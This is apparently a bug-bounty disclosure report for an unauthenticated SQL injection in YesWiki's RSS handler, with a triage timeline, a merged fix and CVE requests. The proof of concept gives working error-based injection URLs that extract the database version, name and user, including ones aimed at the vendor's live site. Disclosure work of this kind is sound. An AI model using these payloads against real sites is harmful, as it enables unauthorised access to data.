UnAuthenticated SQL Injection in yeswiki/yeswiki

Valid

Reported on

Jul 27th 2022


Proof of Concept

POC:
Vendor Domain 
Print version: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+version())))--+-
Print Database: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+database())))--+-
Print User: https://yeswiki.net/?AccueiL/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+user())))--+-

Local Hosted:
Print All: http://192.168.0.109:81/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,version(),database(),user()))))--+-

Find Attached Images for your reference:

LocalHost POC:

Vendor Domain POC:

Impact

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections. The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.

Occurrences

Don't Know :)

We are processing your report and will contact the yeswiki team within 24 hours. 2 months ago
We have contacted a member of the yeswiki team and are waiting to hear back 2 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 2 months ago
Jérémy Dufraisse validated this vulnerability 2 months ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
AggressiveUser
2 months ago

Researcher


Hi @maintainer, Please allow @admin to assign CVE ID on this report after fix

We have sent a fix follow up to the yeswiki team. We will try again in 7 days. 2 months ago
Jérémy Dufraisse confirmed that a fix has been merged on fd59bc a month ago
Jérémy Dufraisse has been awarded the fix bounty
RssHandler.php#L19 has been validated
AggressiveUser
a month ago

Researcher


Dear @maintainer / @admin , can i have CVE for this report ?

Jamie Slome
a month ago

Admin


Happy to assign a CVE once we get the go-ahead from the maintainer 👍

AggressiveUser
a month ago

Researcher


@maintainer Please help us out with this :)

to join this conversation